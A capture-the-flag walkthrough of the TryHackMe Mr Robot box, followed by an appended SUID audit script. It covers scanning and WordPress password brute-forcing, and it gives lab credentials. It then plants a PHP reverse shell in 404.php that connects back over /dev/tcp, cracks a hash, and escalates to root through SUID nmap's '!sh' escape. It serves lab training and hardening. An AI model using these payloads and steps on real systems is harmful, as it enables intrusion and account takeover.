TryHackMe: Mr Robot CTF

ratiros01
Jun 17, 2020


1. Port scan

nmap -Pn <ip>

2. All scan

nmap -A -p 22,80,443 <ip>

3. Vulnerability scan

nmap --script vuln -p 22,80,443 <ip>

This is a WordPress site. There’s a robots.txt file.

4. Access HTTP site

There are commands that I can try.

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.

Viewing source of index page is not useful.

Inspecting the elements is not useful either.

5. Access robots.txt

Download fsocity.dic

wget http://<ip>/fsocity.dic
cat fsocity.dic

This file may contain useful passwords.

Count lines of the file

wc -l fsocity.dic

Sort the file and remove duplicates

sort fsocity.dic | uniq > sort_fsocity.dic
wc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan

nikto -h http://<ip>/ -nossl

7. Directory scan

dirb http://<ip>

Seems like it’s a WordPress site. Access one of the scanned directories.

http://<ip>/0/

View source, nothing useful.

8. WordPress scan

wpscan --url http://<ip>/0/ -et -ep -eu

Failed

Add another flag as suggested

wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu

There are 2 users: mich05654 and elliot.

9. Brute-forcing WordPress

wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php

Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let’s try elliot:ER28-0652

On Dashboard -> Users. Elliot is an administrator.

Let’s get the reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>

Go to Appearance -> Editor and put the code in 404.php

Create a listener

nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/
ls
cat key-2-of-3.txt

I don’t have permission to key2.

Read another file. It’s robot’s credential.

cat password.raw-md5

Crack with hashcat

hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot

su robot

Failed. I need a TTY shell.

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot

su robot

Read key2

cat key-2-of-3.txt

Let’s do privilege escalation

Check if robot can run sudo.

sudo -l

I can’t run sudo.

Looking for SUID

find / -perm -u=s -type f 2>/dev/null

It’s nmap!!!

nmap --interactive
!sh
id

Now I’m root.

cd /root
cat key-3-of-3.txt
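
The root cause of the last step is a setuid bit on a binary that can start a shell. The following audit script is an added example, not part of the original write-up; the watch list and the RISKY/REVIEW labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit setuid files under a
# directory and flag names that should never carry the setuid bit.

# Assumption: an illustrative, incomplete watch list. nmap is on it because
# the SUID nmap found on this box offers --interactive with a "!sh" escape.
WATCHLIST="nmap vim find bash python perl"

# list_suid ROOT: print every regular file under ROOT with the setuid bit set.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# audit_suid ROOT: print "RISKY <owner> <path>" for watch-list names and
# "REVIEW <owner> <path>" for all other setuid files.
# Returns 1 if at least one RISKY file was found, otherwise 0.
audit_suid() {
    found_risky=0
    files=$(list_suid "$1")
    if [ -z "$files" ]; then
        return 0
    fi
    # A here-document keeps the loop in the current shell, so found_risky
    # survives (a pipe into "while" would run it in a subshell).
    while IFS= read -r path; do
        name=$(basename "$path")
        owner=$(ls -ld "$path" | awk '{print $3}')
        case " $WATCHLIST " in
            *" $name "*) echo "RISKY $owner $path"; found_risky=1 ;;
            *)           echo "REVIEW $owner $path" ;;
        esac
    done <<EOF
$files
EOF
    return "$found_risky"
}

# Run only when a directory is given, e.g.: sh suid_audit.sh /
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

A RISKY hit is fixed by clearing the bit with chmod u-s on that path, or by removing the binary if the host does not need it.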
